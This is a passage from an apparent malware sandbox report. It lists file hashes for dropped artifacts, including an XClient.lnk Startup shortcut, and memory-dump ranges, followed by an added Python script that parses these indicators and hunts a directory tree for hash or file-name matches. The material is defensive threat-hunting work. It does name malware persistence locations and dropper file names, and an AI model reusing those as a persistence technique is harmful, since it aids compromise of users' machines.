                                      aa72c54d54f7dcef7482efd77fffe5eb

                                      SHA1

                                      76689cf7194fbf0f0deb4ec2e1d29cdddbceecf0

                                      SHA256

                                      bd9152eb61004161c21b7b2af7873a07dddb6e2fb5966b021825ebaf9b7ff9b0

                                      SHA512

                                      3e1e8c6869d5447fe6c154a095981f3fc1d8638154c22b29c6bf68e4269161431b392d143f7c866c7ea7a828c0a225bf6e341465c9e9e6a96e7a5072bc1c91ff

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jabi5mti.ykw.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                      Filesize

                                      771B

                                      MD5

                                      97a1382ac6d913bba8f28d893061f6bb

                                      SHA1

                                      c6c682b05f8fb99197b5c81766f13dc0dd37dc80

                                      SHA256

                                      9bfec377124051f0a24394eefee72cacf80434eab2aef36569e4eb75eb369c14

                                      SHA512

                                      3a0c992a62f0d04edb248eaf7a581bdcee15c89de0ff7603412035eb0de2f66adae128a6c72e0b2a99051a74fee0167d0f920ea4658dc10e94757dc6960144c6

                                    • C:\Users\Admin\Downloads\Unconfirmed 119546.crdownload

                                      Filesize

                                      12.0MB

                                      MD5

                                      a97ea9e6786a02d1651e023b8e2b6aa1

                                      SHA1

                                      5614e602de8ef7c1095450f5053ed14c8e17f31e

                                      SHA256

                                      8e3ca6388350b76e63e673c31dc7fea8772156f640c0d76c8ddd8e552c9f8e90

                                      SHA512

                                      894c898d1c1b64353bf4f38cbdb477596d780b137a06c2012932c05dddbba4f4f850b76ba0da930b8b626ae6a3b14013ff319a71cb030332dbb9fbd6859b20b8

                                    • memory/5176-93-0x00000000004A0000-0x00000000004E0000-memory.dmp

                                      Filesize

                                      256KB

                                    • memory/5628-320-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5628-318-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5628-315-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5628-301-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5628-300-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5628-299-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5628-321-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5628-316-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5628-319-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5628-317-0x0000028D26770000-0x0000028D26771000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/5768-218-0x0000000000FC0000-0x0000000000FF8000-memory.dmp

                                      Filesize

                                      224KB

                                    • memory/5768-366-0x000000001BD20000-0x000000001BD2C000-memory.dmp

                                      Filesize

                                      48KB

                                    • memory/5816-294-0x000002A54C870000-0x000002A54C882000-memory.dmp

                                      Filesize

                                      72KB

                                    • memory/5816-248-0x000002A54C890000-0x000002A54C8AE000-memory.dmp

                                      Filesize

                                      120KB

                                    • memory/5816-293-0x000002A54C7D0000-0x000002A54C7DA000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/5816-246-0x000002A54C820000-0x000002A54C870000-memory.dmp

                                      Filesize

                                      320KB

                                    • memory/5816-245-0x000002A5651E0000-0x000002A565256000-memory.dmp

                                      Filesize

                                      472KB

                                    • memory/5816-217-0x000002A54AA20000-0x000002A54AA60000-memory.dmp

                                      Filesize

                                      256KB

                                    • memory/6072-228-0x000001E3D7F50000-0x000001E3D7F72000-memory.dmp

                                      Filesize

                                      136KB
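
The hash listing above is only useful once it is machine-readable, and the entries a responder actually hunts for are the dropped executables and the Startup shortcut, not the Edge profile files the sandbox also captured. The Python below is an added example and is not part of the sandbox report or of the sandbox's tooling: it parses entries in the layout above into records (entries without a full hash set, such as the memory dumps, are skipped), hashes files in a single read pass, and walks a directory tree reporting SHA-256 matches and, for entries the report placed under Temp, Startup or Downloads (a staging heuristic chosen for this example), file-name matches. REPORT_EXCERPT is copied from the listing with blank lines collapsed; the files demo() writes are constructed and do not match the report's hashes.

```python
"""Pull file IOCs out of the report's "Downloads" listing and hunt for them on disk.

Added example, not part of the sandbox report or of the sandbox's tooling.
REPORT_EXCERPT is copied from the listing above with blank lines collapsed.
The parser, one-pass hasher, hunt routine and staging-directory heuristic are
this example's own; demo() writes constructed files, not the real dropper.
"""
from __future__ import annotations

import hashlib
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path, PureWindowsPath

REPORT_EXCERPT = r"""
• C:\Users\Admin\AppData\Local\Temp\Cloner.exe
  Filesize 204KB
  MD5 5f43c0499a7d7947f5feb5db1a8726f0
  SHA1 3eb4045f1287531843d11e52423472b54494b02b
  SHA256 2824d0b186c90e04ab56e026c018e7f521e2127bd526d9fca008eaa613fe4012
  SHA512 c7aaee50c4c13b711a46511611c27eb2d6bd92ef26b0b7627f63f34ee45d1386cad819accfd267e89574eea21a5f752706878824f4996b9a7faa4d742789752a
• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
  Filesize 771B
  MD5 97a1382ac6d913bba8f28d893061f6bb
  SHA1 c6c682b05f8fb99197b5c81766f13dc0dd37dc80
  SHA256 9bfec377124051f0a24394eefee72cacf80434eab2aef36569e4eb75eb369c14
  SHA512 3a0c992a62f0d04edb248eaf7a581bdcee15c89de0ff7603412035eb0de2f66adae128a6c72e0b2a99051a74fee0167d0f920ea4658dc10e94757dc6960144c6
• memory/5176-93-0x00000000004A0000-0x00000000004E0000-memory.dmp
  Filesize 256KB
"""


@dataclass(frozen=True)
class FileIoc:
    path: str      # path as reported inside the sandbox VM
    size: str
    md5: str
    sha1: str
    sha256: str
    sha512: str


# One "• path / Filesize / MD5 / SHA1 / SHA256 / SHA512" entry. Whitespace-tolerant, so it
# parses the page's spaced-out layout as well as the collapsed excerpt above.
_ENTRY = re.compile(
    r"•\s*(?P<path>\S.*?)\s+Filesize\s+(?P<size>\S+)\s+"
    r"MD5\s+(?P<md5>[0-9a-fA-F]{32})\s+SHA1\s+(?P<sha1>[0-9a-fA-F]{40})\s+"
    r"SHA256\s+(?P<sha256>[0-9a-fA-F]{64})\s+SHA512\s+(?P<sha512>[0-9a-fA-F]{128})"
)

# Report paths under these directories are treated as attacker-staged, so a file-name
# match alone is worth reporting there; browser profile files are hash-only.
STAGING_MARKERS = ("\\temp\\", "\\startup\\", "\\downloads\\")


def parse_downloads(text: str) -> list[FileIoc]:
    """Entries without the full hash set (memory dumps) produce no record."""
    return [FileIoc(m["path"], m["size"], *(m[h].lower() for h in ("md5", "sha1", "sha256", "sha512")))
            for m in _ENTRY.finditer(text)]


def hash_file(path: Path, chunk: int = 1 << 20) -> dict[str, str]:
    """MD5/SHA1/SHA256/SHA512 of a file, computed in a single read pass."""
    hashers = {n: hashlib.new(n) for n in ("md5", "sha1", "sha256", "sha512")}
    with path.open("rb") as fh:
        while block := fh.read(chunk):
            for h in hashers.values():
                h.update(block)
    return {n: h.hexdigest() for n, h in hashers.items()}


def hunt(root: Path, iocs: list[FileIoc]) -> list[tuple[Path, str, FileIoc]]:
    """Walk root; yield (file, 'hash' | 'name', ioc) for SHA-256 or staged-name matches."""
    by_sha256 = {i.sha256: i for i in iocs}
    by_name = {PureWindowsPath(i.path).name.lower(): i for i in iocs
               if any(marker in i.path.lower() for marker in STAGING_MARKERS)}
    hits = []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        digest = hash_file(p)["sha256"]
        if digest in by_sha256:
            hits.append((p, "hash", by_sha256[digest]))
        elif p.name.lower() in by_name:
            hits.append((p, "name", by_name[p.name.lower()]))
    return hits


def demo() -> dict[str, object]:
    """Offline walkthrough on constructed files; nothing here is the real dropper."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "sub").mkdir()
        sample = root / "sub" / "sample.bin"
        sample.write_bytes(b"abc")                      # constructed content
        digests = hash_file(sample)
        # Hypothetical IOC built from the constructed file so a hash hit is possible offline.
        fake = FileIoc(r"C:\Users\Admin\AppData\Local\Temp\sample.bin", "3B", **digests)
        (root / "Cloner.exe").write_bytes(b"decoy: the dropper's name, other content")
        hits = hunt(root, parse_downloads(REPORT_EXCERPT) + [fake])
        return {"digests": digests, "hits": sorted((p.name, how) for p, how, _ in hits)}
```

On a real host you would point hunt() at the user profile rather than a temporary directory. A name-only hit (an XClient.lnk in Startup, a Cloner.exe or Grabb.exe in Temp) with a different hash is still worth collecting: hashes change with every rebuild of a stub, while drop locations and file names tend to be reused.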
